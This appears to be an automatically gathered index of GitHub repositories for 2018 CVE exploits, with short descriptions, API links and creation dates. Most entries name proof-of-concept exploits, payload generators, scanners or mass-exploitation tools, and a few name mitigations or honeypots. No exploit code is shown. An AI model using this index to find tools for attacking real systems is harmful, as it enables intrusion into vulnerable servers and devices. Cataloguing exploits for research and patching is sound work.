**This tool takes advantage of CVE-2018-11776 and Shodan to perform mass exploitation of verified and vulnerable Apache Struts servers.** : [649/Apache-Struts-Shodan-Exploit](https://api.github.com/repos/649/Apache-Struts-Shodan-Exploit) create time: 2018-08-29T19:50:26Z

**Mitigate CVE-2018-6389 WordPress load-scripts / load-styles attacks** : [ItinerisLtd/trellis-cve-2018-6389](https://api.github.com/repos/ItinerisLtd/trellis-cve-2018-6389) create time: 2018-08-30T01:25:20Z

**My first Android app: Launch Fusée Gelée payloads from stock Android (CVE-2018-6242)** : [DavidBuchanan314/NXLoader](https://api.github.com/repos/DavidBuchanan314/NXLoader) create time: 2018-04-28T11:50:00Z

**a small utility to generate a cookie in order to exploit a grafana vulnerability (CVE-2018-15727)** : [u238/grafana-CVE-2018-15727](https://api.github.com/repos/u238/grafana-CVE-2018-15727) create time: 2018-08-29T16:35:22Z

**CVE-2018-??? - CA Dollar Universe 5.3.3 'uxdqmsrv' - Privilege escalation via a vulnerable setuid binary** : [sasqwatch/ca-dollaru-uxdqmsrv-privesc](https://api.github.com/repos/sasqwatch/ca-dollaru-uxdqmsrv-privesc) create time: 2019-01-10T18:36:58Z

**Flash Exploit Poc** : [SyFi/CVE-2018-4878](https://api.github.com/repos/SyFi/CVE-2018-4878) create time: 2018-04-04T04:33:44Z

**Flexense HTTP Server <= 10.6.24 - Denial Of Service Exploit** : [EgeBalci/CVE-2018-8065](https://api.github.com/repos/EgeBalci/CVE-2018-8065) create time: 2018-05-25T17:31:05Z

**A remote code execution exploit for WebLogic based on CVE-2018-2628** : [Nervous/WebLogic-RCE-exploit](https://api.github.com/repos/Nervous/WebLogic-RCE-exploit) create time: 2018-09-04T12:17:21Z

**None** : [GitHubAssessments/CVE_Assessment_03_2018](https://api.github.com/repos/GitHubAssessments/CVE_Assessment_03_2018) create time: 2018-09-05T01:25:08Z

**Zimbra Collaboration Suite Username Enumeration ** : [0x00-0x00/CVE-2018-10949](https://api.github.com/repos/0x00-0x00/CVE-2018-10949) create time: 2018-09-05T14:09:13Z

**Zimbra Collaboration Suite Username Enumeration ** : [0x00-0x00/CVE-2018-15131](https://api.github.com/repos/0x00-0x00/CVE-2018-15131) create time: 2018-09-05T14:11:16Z

**Frog CMS 0.9.5 has an Upload > vulnerability that can create files via > /admin/?/plugin/file_manager/save** : [snappyJack/CVE-2018-16373](https://api.github.com/repos/snappyJack/CVE-2018-16373) create time: 2018-09-06T02:00:24Z

**In PESCMS Team 2.2.1, attackers may upload and execute arbitrary PHP code through /Public/?g=Team&m=Setting&a=upgrade by placing a .php file in a ZIP archive.** : [snappyJack/CVE-2018-16370](https://api.github.com/repos/snappyJack/CVE-2018-16370) create time: 2018-09-06T01:52:47Z

**None** : [likescam/CVE-2018-8174-msf](https://api.github.com/repos/likescam/CVE-2018-8174-msf) create time: 2018-09-06T04:03:25Z

**None** : [jezzus/CVE-2018-11776-Python-PoC](https://api.github.com/repos/jezzus/CVE-2018-11776-Python-PoC) create time: 2018-09-06T23:49:20Z

**None** : [jezzus/CVE-2018-4121](https://api.github.com/repos/jezzus/CVE-2018-4121) create time: 2018-09-06T23:55:43Z

**None** : [GitHubAssessments/CVE_Assessment_04_2018](https://api.github.com/repos/GitHubAssessments/CVE_Assessment_04_2018) create time: 2018-09-09T17:36:02Z

**Simple poc of CVE-2018-8353 Microsoft Scripting Engine Use After Free** : [whereisr0da/CVE-2018-8353-POC](https://api.github.com/repos/whereisr0da/CVE-2018-8353-POC) create time: 2018-09-10T17:28:05Z

**GitStackRCE漏洞(CVE-2018-5955)EXP** : [cisp/GitStackRCE](https://api.github.com/repos/cisp/GitStackRCE) create time: 2018-09-11T04:39:43Z

**Foxit Reader version 9.0.1.1049 Use After Free with ASLR and DEP bypass on heap** : [manojcode/Foxit-Reader-RCE-with-virualalloc-and-shellcode-for-CVE-2018-9948-and-CVE-2018-9958](https://api.github.com/repos/manojcode/Foxit-Reader-RCE-with-virualalloc-and-shellcode-for-CVE-2018-9948-and-CVE-2018-9958) create time: 2018-08-04T02:32:28Z

**C# implementation of BasuCert/WinboxPoC [Winbox Critical Vulnerability (CVE-2018-14847)]** : [msterusky/WinboxExploit](https://api.github.com/repos/msterusky/WinboxExploit) create time: 2018-09-11T19:36:49Z

**None** : [idkwim/CVE-2018-8420](https://api.github.com/repos/idkwim/CVE-2018-8420) create time: 2018-09-12T08:22:54Z

**CVE-2018-15832** : [JacksonKuo/Ubisoft-Uplay-Desktop-Client-63.0.5699.0](https://api.github.com/repos/JacksonKuo/Ubisoft-Uplay-Desktop-Client-63.0.5699.0) create time: 2018-09-12T04:59:11Z

**Proof of Concept for CVE-2018-11776** : [Ekultek/Strutter](https://api.github.com/repos/Ekultek/Strutter) create time: 2018-08-27T17:22:16Z

**None** : [harryanon/POC-CVE-2018-4327-and-CVE-2018-4330](https://api.github.com/repos/harryanon/POC-CVE-2018-4327-and-CVE-2018-4330) create time: 2018-09-12T22:00:58Z

** POC for CVE-2018-4327** : [omerporze/brokentooth](https://api.github.com/repos/omerporze/brokentooth) create time: 2018-09-11T19:15:09Z

**Details about CVE-2018-16987 - Cleartext storage of TA servers' passwords in Squash TM** : [gquere/CVE-2018-16987](https://api.github.com/repos/gquere/CVE-2018-16987) create time: 2018-09-13T15:32:48Z

**CVE-2018-4330 POC for iOS** : [omerporze/toothfairy](https://api.github.com/repos/omerporze/toothfairy) create time: 2018-09-13T16:05:20Z

**Python CVE-2018-1000802 Proof-of-Concept** : [tna0y/CVE-2018-1000802-PoC](https://api.github.com/repos/tna0y/CVE-2018-1000802-PoC) create time: 2018-09-14T16:22:12Z

**None** : [kenprice/cve-2018-6574](https://api.github.com/repos/kenprice/cve-2018-6574) create time: 2018-09-23T20:00:38Z

**monstra_cms-3.0.4-上传getshell CVE-2018-17418** : [AlwaysHereFight/monstra_cms-3.0.4--getshell](https://api.github.com/repos/AlwaysHereFight/monstra_cms-3.0.4--getshell) create time: 2018-09-19T08:54:45Z

**PoC code for CVE-2018-16711 (exploit by wrmsr)** : [DownWithUp/CVE-2018-16711](https://api.github.com/repos/DownWithUp/CVE-2018-16711) create time: 2018-09-18T22:18:32Z

**PoC code for CVE-2018-16713 (exploit by rdmsr)** : [DownWithUp/CVE-2018-16713](https://api.github.com/repos/DownWithUp/CVE-2018-16713) create time: 2018-09-14T14:10:22Z

**MICROS Honeypot is a low interaction honeypot to detect CVE-2018-2636 in the Oracle Hospitality Simphony component of Oracle Hospitality Applications (MICROS). This is a directory traversal vulnerability.** : [Cymmetria/micros_honeypot](https://api.github.com/repos/Cymmetria/micros_honeypot) create time: 2018-02-07T05:54:46Z

**None** : [nixwizard/CVE-2018-15365](https://api.github.com/repos/nixwizard/CVE-2018-15365) create time: 2018-09-26T18:56:41Z

**PoC for CVE-2018-15133 (Laravel unserialize vulnerability)** : [kozmic/laravel-poc-CVE-2018-15133](https://api.github.com/repos/kozmic/laravel-poc-CVE-2018-15133) create time: 2018-08-14T18:51:50Z

**None** : [beverlymiller818/cve-2018-9075](https://api.github.com/repos/beverlymiller818/cve-2018-9075) create time: 2018-09-27T17:58:00Z

**None** : [mikerissi/CVE-2018](https://api.github.com/repos/mikerissi/CVE-2018) create time: 2018-08-04T22:37:10Z

**None** : [likescam/CVE-2018-17182](https://api.github.com/repos/likescam/CVE-2018-17182) create time: 2018-10-01T03:20:05Z

**None** : [likescam/vmacache_CVE-2018-17182](https://api.github.com/repos/likescam/vmacache_CVE-2018-17182) create time: 2018-10-01T03:29:04Z

**Linux 内核VMA-UAF 提权漏洞(CVE-2018-17182),0day** : [jas502n/CVE-2018-17182](https://api.github.com/repos/jas502n/CVE-2018-17182) create time: 2018-09-29T15:58:55Z

**None** : [webr0ck/poc-cve-2018-1273](https://api.github.com/repos/webr0ck/poc-cve-2018-1273) create time: 2018-10-05T14:42:07Z

**None** : [evgind/scada_cve2018-16670](https://api.github.com/repos/evgind/scada_cve2018-16670) create time: 2018-10-06T22:10:36Z

**CVE-2018-2893** : [jas502n/CVE-2018-2893](https://api.github.com/repos/jas502n/CVE-2018-2893) create time: 2018-10-07T08:41:14Z

**GIT_CVE_2018_17456** : [back2zero/GIT_CVE_2018_17456](https://api.github.com/repos/back2zero/GIT_CVE_2018_17456) create time: 2018-10-09T02:52:03Z

**proof-of-concept (PoC) for linux dists based on Debian, CentOS and RedHat - exploit 1** : [luan0ap/cve-2018-14634](https://api.github.com/repos/luan0ap/cve-2018-14634) create time: 2018-10-08T18:12:03Z

**Ban all denial-of-service vulnerability exploitable nodes from your node CVE-2018-17144 ** : [iioch/ban-exploitable-bitcoin-nodes](https://api.github.com/repos/iioch/ban-exploitable-bitcoin-nodes) create time: 2018-10-10T19:44:09Z

**Ektron Content Management System (CMS) 9.20 SP2, remote re-enabling users (CVE-2018–12596)** : [alt3kx/CVE-2018-12596](https://api.github.com/repos/alt3kx/CVE-2018-12596) create time: 2018-06-21T06:47:05Z

**DVR-Exploiter a Bash Script Program Exploit The DVR's Based on CVE-2018-9995** : [Cyb0r9/DVR-Exploiter](https://api.github.com/repos/Cyb0r9/DVR-Exploiter) create time: 2018-09-23T20:58:40Z

**Simple poc of CVE-2018-8495 Microsoft Edge Remote Code Execution** : [whereisr0da/CVE-2018-8495-POC](https://api.github.com/repos/whereisr0da/CVE-2018-8495-POC) create time: 2018-10-12T16:49:57Z

**Automated version of CVE-2018-14847 (MikroTik Exploit)** : [syrex1013/MikroRoot](https://api.github.com/repos/syrex1013/MikroRoot) create time: 2018-10-13T19:17:42Z

**CVE-2018-15473 - Opensshenum is an user enumerator exploiting an OpenSsh bug** : [gbonacini/opensshenum](https://api.github.com/repos/gbonacini/opensshenum) create time: 2018-08-19T11:23:54Z

**CVE-2018-10933 sshlib user authentication attack - docker lab, test and exploit** : [hook-s3c/CVE-2018-10933](https://api.github.com/repos/hook-s3c/CVE-2018-10933) create time: 2018-10-17T15:09:41Z

**Leveraging it is a simple matter of presenting the server with the SSH2_MSG_USERAUTH_SUCCESS message, which shows that the login already occurred without a problem. The server expects the message SSH2_MSG_USERAUTH_REQUEST to start the authentication procedure, but by skipping it an attacker can log in without showing any credentials.** : [kn6869610/CVE-2018-10933](https://api.github.com/repos/kn6869610/CVE-2018-10933) create time: 2018-10-17T18:44:05Z

**None** : [likescam/CVE-2018-10933_ssh](https://api.github.com/repos/likescam/CVE-2018-10933_ssh) create time: 2018-10-18T04:10:25Z

**None** : [likescam/CVE-2018-10933-libSSH-Authentication-Bypass](https://api.github.com/repos/likescam/CVE-2018-10933-libSSH-Authentication-Bypass) create time: 2018-10-18T09:27:08Z

**Hunt for and Exploit the libSSH Authentication Bypass (CVE-2018-10933)** : [marco-lancini/hunt-for-cve-2018-10933](https://api.github.com/repos/marco-lancini/hunt-for-cve-2018-10933) create time: 2018-10-18T15:08:25Z

**None** : [GitHubAssessments/CVE_Assessment_05_2018](https://api.github.com/repos/GitHubAssessments/CVE_Assessment_05_2018) create time: 2018-09-21T22:54:29Z

**libssh CVE-2018-10933** : [jas502n/CVE-2018-10933](https://api.github.com/repos/jas502n/CVE-2018-10933) create time: 2018-10-20T00:24:04Z

**Variant of hackerhouse-opensource/cve-2018-10933** : [ninp0/cve-2018-10933_poc](https://api.github.com/repos/ninp0/cve-2018-10933_poc) create time: 2018-10-20T00:53:24Z

**None** : [pghook/CVE-2018-10933_Scanner](https://api.github.com/repos/pghook/CVE-2018-10933_Scanner) create time: 2018-10-20T06:53:59Z

**EPoD (Ethereum Packet of Death)** : [k3v142/CVE-2018-12018](https://api.github.com/repos/k3v142/CVE-2018-12018) create time: 2018-10-19T11:11:01Z

**CVE-2018-10933** : [shifa123/pythonprojects-CVE-2018-10933](https://api.github.com/repos/shifa123/pythonprojects-CVE-2018-10933) create time: 2018-10-21T05:01:12Z

**Drupal File Upload Exploit** : [SecPentester/CVE-7600-2018](https://api.github.com/repos/SecPentester/CVE-7600-2018) create time: 2018-10-21T13:48:13Z

**CVE-2018-3191 payload generator** : [arongmh/CVE-2018-3191](https://api.github.com/repos/arongmh/CVE-2018-3191) create time: 2018-10-22T02:29:12Z

**cve-2018-10933 libssh authentication bypass** : [hackerhouse-opensource/cve-2018-10933](https://api.github.com/repos/hackerhouse-opensource/cve-2018-10933) create time: 2018-10-18T19:13:45Z

**Multi-threaded, reliable scanner for CVE-2018-10933.** : [trbpnd/bpnd-libssh](https://api.github.com/repos/trbpnd/bpnd-libssh) create time: 2018-10-18T04:11:33Z

**A Python PoC for CVE-2018-9206** : [Den1al/CVE-2018-9206](https://api.github.com/repos/Den1al/CVE-2018-9206) create time: 2018-10-22T16:33:22Z

**None** : [cve-2018/cve-2018-10933](https://api.github.com/repos/cve-2018/cve-2018-10933) create time: 2018-10-18T20:11:22Z

**1-day** : [shpik-kr/CVE-2018-17456](https://api.github.com/repos/shpik-kr/CVE-2018-17456) create time: 2018-10-21T17:46:10Z

**CVE-2018-10933 very simple POC** : [SoledaD208/CVE-2018-10933](https://api.github.com/repos/SoledaD208/CVE-2018-10933) create time: 2018-10-17T09:01:44Z

**CVE-2018-3191 反弹shell** : [Libraggbond/CVE-2018-3191](https://api.github.com/repos/Libraggbond/CVE-2018-3191) create time: 2018-10-23T17:24:43Z

**CVE-2018-10933** : [Bifrozt/CVE-2018-10933](https://api.github.com/repos/Bifrozt/CVE-2018-10933) create time: 2018-10-23T20:11:35Z

**Metasploit module for CVE-2018-4878** : [B0fH/CVE-2018-4878](https://api.github.com/repos/B0fH/CVE-2018-4878) create time: 2018-10-17T02:11:24Z

**CVE-2018-10933 POC (LIBSSH)** : [r3dxpl0it/CVE-2018-10933](https://api.github.com/repos/r3dxpl0it/CVE-2018-10933) create time: 2018-10-23T21:17:52Z

**A libssh CVE-2018-10933 scanner written in rust** : [ivanacostarubio/libssh-scanner](https://api.github.com/repos/ivanacostarubio/libssh-scanner) create time: 2018-10-24T12:52:09Z

**None** : [throwawayaccount12312312/precompiled-CVE-2018-10933](https://api.github.com/repos/throwawayaccount12312312/precompiled-CVE-2018-10933) create time: 2018-10-24T15:02:51Z

**Weblogic-CVE-2018-3191远程代码命令执行漏洞** : [jas502n/CVE-2018-3191](https://api.github.com/repos/jas502n/CVE-2018-3191) create time: 2018-10-24T02:26:53Z

**CVE-2018-3245** : [jas502n/CVE-2018-3245](https://api.github.com/repos/jas502n/CVE-2018-3245) create time: 2018-10-25T01:46:56Z

**Weblogic-CVE-2018-3252** : [jas502n/CVE-2018-3252](https://api.github.com/repos/jas502n/CVE-2018-3252) create time: 2018-10-25T02:16:49Z

**None** : [mackleadmire/CVE-2018-3191-Rce-Exploit](https://api.github.com/repos/mackleadmire/CVE-2018-3191-Rce-Exploit) create time: 2018-10-24T09:54:00Z

**LibSSH Authentication Bypass Exploit using RCE** : [Virgula0/POC-CVE-2018-10933](https://api.github.com/repos/Virgula0/POC-CVE-2018-10933) create time: 2018-10-20T15:34:26Z

**playSMS < = 1.4.2 - Privilege escalation** : [TheeBlind/CVE-2018-18387](https://api.github.com/repos/TheeBlind/CVE-2018-18387) create time: 2018-10-18T17:40:42Z

**CVE-2018-3191-PoC** : [pyn3rd/CVE-2018-3191](https://api.github.com/repos/pyn3rd/CVE-2018-3191) create time: 2018-10-23T02:43:39Z

**CVE-2018-3245-PoC** : [pyn3rd/CVE-2018-3245](https://api.github.com/repos/pyn3rd/CVE-2018-3245) create time: 2018-10-24T06:49:33Z

**CVE-2018-2893-PoC** : [pyn3rd/CVE-2018-2893](https://api.github.com/repos/pyn3rd/CVE-2018-2893) create time: 2018-07-22T01:15:58Z

**OpenBsd_CVE-2018-14665** : [jas502n/CVE-2018-14665](https://api.github.com/repos/jas502n/CVE-2018-14665) create time: 2018-10-27T10:12:05Z

**CVE-2018-4280: Mach port replacement vulnerability in launchd on macOS 10.13.5 leading to local privilege escalation and SIP bypass.** : [bazad/launchd-portrep](https://api.github.com/repos/bazad/launchd-portrep) create time: 2018-01-22T06:22:59Z

**A weaponized version of CVE-2018-9206** : [Stahlz/JQShell](https://api.github.com/repos/Stahlz/JQShell) create time: 2018-10-24T20:24:20Z

**CVE-2018-2628漏洞工具包** : [Lighird/CVE-2018-2628](https://api.github.com/repos/Lighird/CVE-2018-2628) create time: 2018-10-30T03:26:16Z

**Exploit code for CVE-2018-9411 for MediaCasService** : [tamirzb/CVE-2018-9411](https://api.github.com/repos/tamirzb/CVE-2018-9411) create time: 2018-10-30T18:48:20Z

**CVE-2018-8440 standalone exploit** : [sourceincite/CVE-2018-8440](https://api.github.com/repos/sourceincite/CVE-2018-8440) create time: 2018-10-31T17:00:43Z

**RCE exploit for CVE-2018-14772** : [spencerdodd/CVE-2018-14772](https://api.github.com/repos/spencerdodd/CVE-2018-14772) create time: 2018-09-11T01:24:21Z

**Exploit for vulnerability CVE-2018-6389 on wordpress sites** : [Zazzzles/Wordpress-DOS](https://api.github.com/repos/Zazzzles/Wordpress-DOS) create time: 2018-10-28T21:05:04Z

**iOS 12 / OS X Remote Kernel Heap Overflow (CVE-2018-4407) POC** : [Pa55w0rd/check_icmp_dos](https://api.github.com/repos/Pa55w0rd/check_icmp_dos) create time: 2018-11-01T08:21:59Z

**None** : [matlink/CVE-2018-17961](https://api.github.com/repos/matlink/CVE-2018-17961) create time: 2018-11-01T13:33:12Z

**None** : [redirected/cve-2018-6574](https://api.github.com/repos/redirected/cve-2018-6574) create time: 2018-11-01T18:44:35Z

**CVE-2018-4407 概述與實現** : [s2339956/check_icmp_dos-CVE-2018-4407-](https://api.github.com/repos/s2339956/check_icmp_dos-CVE-2018-4407-) create time: 2018-11-02T03:38:41Z

**Node.js PoC exploit code for CVE-2018-4407** : [SamDecrock/node-cve-2018-4407](https://api.github.com/repos/SamDecrock/node-cve-2018-4407) create time: 2018-11-02T22:00:17Z

**IOS/MAC Denial-Of-Service [POC/EXPLOIT FOR MASSIVE ATTACK TO IOS/MAC IN NETWORK]** : [r3dxpl0it/CVE-2018-4407](https://api.github.com/repos/r3dxpl0it/CVE-2018-4407) create time: 2018-11-04T01:47:05Z

**Script to identify hosts vulnerable to CVE-2018-10933** : [leapsecurity/libssh-scanner](https://api.github.com/repos/leapsecurity/libssh-scanner) create time: 2018-10-17T23:05:10Z

**A buffer overflow vulnerability in the XNU kernel's ICMP error code causes IOS devices to crash (laptops and mobiles).** : [lucagiovagnoli/CVE-2018-4407](https://api.github.com/repos/lucagiovagnoli/CVE-2018-4407) create time: 2018-11-04T05:10:38Z

**an RCE (remote command execution) approach of CVE-2018-7750** : [jm33-m0/CVE-2018-7750](https://api.github.com/repos/jm33-m0/CVE-2018-7750) create time: 2018-11-06T10:01:13Z

**PoC Code for CVE-2018-18026 (exploit by stack overflow)** : [DownWithUp/CVE-2018-18026](https://api.github.com/repos/DownWithUp/CVE-2018-18026) create time: 2018-10-18T16:51:26Z

**None** : [dragotime/cve-2018-1000134](https://api.github.com/repos/dragotime/cve-2018-1000134) create time: 2018-11-07T06:22:47Z

**None** : [matlink/CVE-2018-17456](https://api.github.com/repos/matlink/CVE-2018-17456) create time: 2018-11-08T14:03:52Z

**None** : [ab1gale/phpcms-2008-CVE-2018-19127](https://api.github.com/repos/ab1gale/phpcms-2008-CVE-2018-19127) create time: 2018-11-09T09:51:26Z

**PHPMyAdmin v4.8.0 and v.4.8.1 LFI exploit** : [0x00-0x00/CVE-2018-12613](https://api.github.com/repos/0x00-0x00/CVE-2018-12613) create time: 2018-11-09T14:10:20Z

**Wordpress plugin Site-Editor v1.1.1 LFI exploit** : [0x00-0x00/CVE-2018-7422](https://api.github.com/repos/0x00-0x00/CVE-2018-7422) create time: 2018-11-09T14:42:57Z

**CMS Made Simple 2.2.7 RCE exploit** : [0x00-0x00/CVE-2018-10517](https://api.github.com/repos/0x00-0x00/CVE-2018-10517) create time: 2018-11-09T16:09:39Z

**PoC Code for CVE-2018-18714 (exploit by stack overflow)** : [DownWithUp/CVE-2018-18714](https://api.github.com/repos/DownWithUp/CVE-2018-18714) create time: 2018-11-01T20:31:50Z

**None** : [ameenudeen/CVE2018](https://api.github.com/repos/ameenudeen/CVE2018) create time: 2018-10-30T09:31:56Z

** PoC code for CVE-2018-9539** : [tamirzb/CVE-2018-9539](https://api.github.com/repos/tamirzb/CVE-2018-9539) create time: 2018-11-11T14:14:04Z

**Put the *.py files to test/functional folder of bitcoin sourcecode (commit: 4901c00792c1dabae4bb01e6373c9b1ed9ef3008)** : [hikame/CVE-2018-17144_POC](https://api.github.com/repos/hikame/CVE-2018-17144_POC) create time: 2018-10-31T09:07:35Z

**CVE-2018-4280: Mach port replacement vulnerability in launchd on iOS 11.2.6 leading to sandbox escape, privilege escalation, and codesigning bypass.** : [bazad/blanket](https://api.github.com/repos/bazad/blanket) create time: 2018-02-23T00:19:05Z

**Proof-of-Concept exploit of CVE-2018-19131: Squid Proxy XSS via X.509 Certificate** : [JonathanWilbur/CVE-2018-19131](https://api.github.com/repos/JonathanWilbur/CVE-2018-19131) create time: 2018-11-13T13:40:10Z

**Crash macOS and iOS devices with one packet** : [unixpickle/cve-2018-4407](https://api.github.com/repos/unixpickle/cve-2018-4407) create time: 2018-11-01T17:03:25Z

**Implementation of CVE-2018-10933 with CIDR block scanner ** : [Ad1bDaw/libSSH-bypass](https://api.github.com/repos/Ad1bDaw/libSSH-bypass) create time: 2018-11-16T18:46:28Z

**cve-2018-14667 demo** : [nareshmail/cve-2018-14667](https://api.github.com/repos/nareshmail/cve-2018-14667) create time: 2018-11-18T06:43:46Z

**CVE-2018-7600 (Drupal)** : [knqyf263/CVE-2018-7600](https://api.github.com/repos/knqyf263/CVE-2018-7600) create time: 2018-04-13T10:04:36Z

**None** : [tafamace/CVE-2018-1259](https://api.github.com/repos/tafamace/CVE-2018-1259) create time: 2018-11-19T09:25:32Z

**None** : [tafamace/CVE-2018-13864](https://api.github.com/repos/tafamace/CVE-2018-13864) create time: 2018-11-19T09:40:47Z

**None** : [tafamace/CVE-2018-12418](https://api.github.com/repos/tafamace/CVE-2018-12418) create time: 2018-11-19T11:12:00Z

**None** : [tafamace/CVE-2018-12537](https://api.github.com/repos/tafamace/CVE-2018-12537) create time: 2018-11-19T11:18:35Z

**None** : [tafamace/CVE-2018-12540](https://api.github.com/repos/tafamace/CVE-2018-12540) create time: 2018-11-19T11:41:16Z

**None** : [tafamace/CVE-2018-1270](https://api.github.com/repos/tafamace/CVE-2018-1270) create time: 2018-11-19T11:47:40Z

**None** : [tafamace/CVE-2018-8039](https://api.github.com/repos/tafamace/CVE-2018-8039) create time: 2018-11-19T12:08:07Z

**None** : [tafamace/CVE-2018-8038](https://api.github.com/repos/tafamace/CVE-2018-8038) create time: 2018-11-19T12:14:45Z

**None** : [tafamace/CVE-2018-1313](https://api.github.com/repos/tafamace/CVE-2018-1313) create time: 2018-11-19T12:38:21Z

**None** : [tafamace/CVE-2018-1324](https://api.github.com/repos/tafamace/CVE-2018-1324) create time: 2018-11-19T12:46:37Z

**None** : [tafamace/CVE-2018-10936](https://api.github.com/repos/tafamace/CVE-2018-10936) create time: 2018-11-19T13:09:47Z

**None** : [tafamace/CVE-2018-7489](https://api.github.com/repos/tafamace/CVE-2018-7489) create time: 2018-11-19T13:13:27Z

**libSSH bypass** : [sambiyal/CVE-2018-10933-POC](https://api.github.com/repos/sambiyal/CVE-2018-10933-POC) create time: 2018-11-21T09:34:12Z

**None** : [zeroto01/CVE-2018-14667](https://api.github.com/repos/zeroto01/CVE-2018-14667) create time: 2018-11-23T06:44:49Z

**A low interaction honeypot for the Cisco ASA component capable of detecting CVE-2018-0101, a DoS and remote code execution vulnerability.** : [Cymmetria/ciscoasa_honeypot](https://api.github.com/repos/Cymmetria/ciscoasa_honeypot) create time: 2018-02-08T15:52:50Z

**CVE-2018-11235 (Git)** : [knqyf263/CVE-2018-11235](https://api.github.com/repos/knqyf263/CVE-2018-11235) create time: 2018-08-01T11:52:54Z

**TALOS-2018-0684/cve-2018-4013 poc** : [DoubleMice/cve-2018-4013](https://api.github.com/repos/DoubleMice/cve-2018-4013) create time: 2018-10-24T08:19:25Z

**None** : [moajo/cve_2018_11235](https://api.github.com/repos/moajo/cve_2018_11235) create time: 2018-11-24T06:08:06Z

**iOS 11 WiFi Exploit - icmp_error_CVE-2018-4407** : [soccercab/wifi](https://api.github.com/repos/soccercab/wifi) create time: 2018-11-26T14:14:55Z

**CVE-2018-19537** : [JackDoan/TP-Link-ArcherC5-RCE](https://api.github.com/repos/JackDoan/TP-Link-ArcherC5-RCE) create time: 2018-11-25T23:03:19Z

**RTSPServer Code Execution Vulnerability CVE-2018-4013** : [r3dxpl0it/RTSPServer-Code-Execution-Vulnerability](https://api.github.com/repos/r3dxpl0it/RTSPServer-Code-Execution-Vulnerability) create time: 2018-11-24T15:49:53Z

**Exploit of the privilege escalation vulnerability of the WordPress plugin "WP GDPR Compliance" by "Van Ons" (https://de.wordpress.org/plugins/wp-gdpr-compliance/) CVE-2018-19207** : [aeroot/WP-GDPR-Compliance-Plugin-Exploit](https://api.github.com/repos/aeroot/WP-GDPR-Compliance-Plugin-Exploit) create time: 2018-11-27T14:27:06Z

**None** : [ensimag-security/CVE-2018-10933](https://api.github.com/repos/ensimag-security/CVE-2018-10933) create time: 2018-10-25T06:32:06Z

**about CVE-2018-14667 from RichFaces Framework 3.3.4** : [r00t4dm/CVE-2018-14667](https://api.github.com/repos/r00t4dm/CVE-2018-14667) create time: 2018-11-28T07:35:28Z

**None** : [T1V0h/CVE-2018-4415](https://api.github.com/repos/T1V0h/CVE-2018-4415) create time: 2018-11-29T14:06:50Z

**All about CVE-2018-14667; From what it is to how to successfully exploit it.** : [syriusbughunt/CVE-2018-14667](https://api.github.com/repos/syriusbughunt/CVE-2018-14667) create time: 2018-11-30T04:06:08Z

**PoC Code for CVE-2018-16712 (exploit by MmMapIoSpace)** : [DownWithUp/CVE-2018-16712](https://api.github.com/repos/DownWithUp/CVE-2018-16712) create time: 2018-09-23T16:03:06Z

**POC: Heap buffer overflow in the networking code in the XNU operating system kernel** : [zteeed/CVE-2018-4407-IOS](https://api.github.com/repos/zteeed/CVE-2018-4407-IOS) create time: 2018-11-02T15:26:47Z

**CVE-2018-8021 Proof-Of-Concept and Exploit ** : [r3dxpl0it/Apache-Superset-Remote-Code-Execution-PoC-CVE-2018-8021](https://api.github.com/repos/r3dxpl0it/Apache-Superset-Remote-Code-Execution-PoC-CVE-2018-8021) create time: 2018-12-02T19:01:17Z

**None** : [b1ueb0y/CVE-2018-3252](https://api.github.com/repos/b1ueb0y/CVE-2018-3252) create time: 2018-12-04T03:14:21Z

**Messing Apple devices on the network with CVE-2018-4407 (heap overflow in bad packet handling)** : [farisv/AppleDOS](https://api.github.com/repos/farisv/AppleDOS) create time: 2018-11-02T08:29:29Z

**None** : [lkostick/security_privacy_cve_2018](https://api.github.com/repos/lkostick/security_privacy_cve_2018) create time: 2018-11-29T15:50:02Z

**Fully functional script for brute forcing SSH and trying credentials - CVE-2018-15473** : [JoeBlackSecurity/SSHUsernameBruter-SSHUB](https://api.github.com/repos/JoeBlackSecurity/SSHUsernameBruter-SSHUB) create time: 2018-10-31T03:23:46Z

**Flash sources for CVE-2018-15982 used by NK** : [FlatL1neAPT/CVE-2018-15982](https://api.github.com/repos/FlatL1neAPT/CVE-2018-15982) create time: 2018-12-05T23:41:37Z

**freeswitch all version remote command execute (cve-2018-19911)** : [iSafeBlue/freeswitch_rce](https://api.github.com/repos/iSafeBlue/freeswitch_rce) create time: 2018-12-06T05:48:02Z

**Silly easy exploit for CVE-2018-19788** : [AbsoZed/CVE-2018-19788](https://api.github.com/repos/AbsoZed/CVE-2018-19788) create time: 2018-12-07T00:42:35Z

**CVE-2018-3252-PoC** : [pyn3rd/CVE-2018-3252](https://api.github.com/repos/pyn3rd/CVE-2018-3252) create time: 2018-12-06T13:48:53Z

**PowerShell script to mitigate CVE-2018-12038. The script takes a list of PC as input, gets their BitLocker encryption type remotely, and outputs a report as a CSV file** : [gdraperi/remote-bitlocker-encryption-report](https://api.github.com/repos/gdraperi/remote-bitlocker-encryption-report) create time: 2018-12-17T16:02:26Z

**None** : [yeonnic/Look-at-The-XNU-Through-A-Tube-CVE-2018-4242-Write-up-Translation-](https://api.github.com/repos/yeonnic/Look-at-The-XNU-Through-A-Tube-CVE-2018-4242-Write-up-Translation-) create time: 2018-12-08T00:13:28Z

**Test CVE-2018-0296 and extract usernames** : [milo2012/CVE-2018-0296](https://api.github.com/repos/milo2012/CVE-2018-0296) create time: 2018-06-21T08:36:34Z

**Ansible role to check the vulnerability tracked as CVE-2018-19788, impacts PolicyKit version 0.115 which comes pre-installed on a wide range of Linux distributions** : [d4gh0s7/CVE-2018-19788](https://api.github.com/repos/d4gh0s7/CVE-2018-19788) create time: 2018-12-07T20:27:01Z

**Proof of concept showing how to exploit the CVE-2018-11759** : [immunIT/CVE-2018-11759](https://api.github.com/repos/immunIT/CVE-2018-11759) create time: 2018-11-01T09:11:07Z

**Unrestricted file upload in Adobe ColdFusion** : [vah13/CVE-2018-15961](https://api.github.com/repos/vah13/CVE-2018-15961) create time: 2018-12-06T15:47:57Z

**Integer Overflow (CyberSecurity | UMCP 2018) . This involves exploiting integer overflow vulnerability present in mem_check function of infiniband Soft RoCE implemetation (Ref: CVE-2016-8636). It also exploring Pwnie Adventure island (Reference: LiveOverflow)** : [jigerjain/Integer-Overflow-test](https://api.github.com/repos/jigerjain/Integer-Overflow-test) create time: 2018-12-11T20:30:31Z

**None** : [securifera/CVE-2018-16156-Exploit](https://api.github.com/repos/securifera/CVE-2018-16156-Exploit) create time: 2018-12-11T22:25:22Z

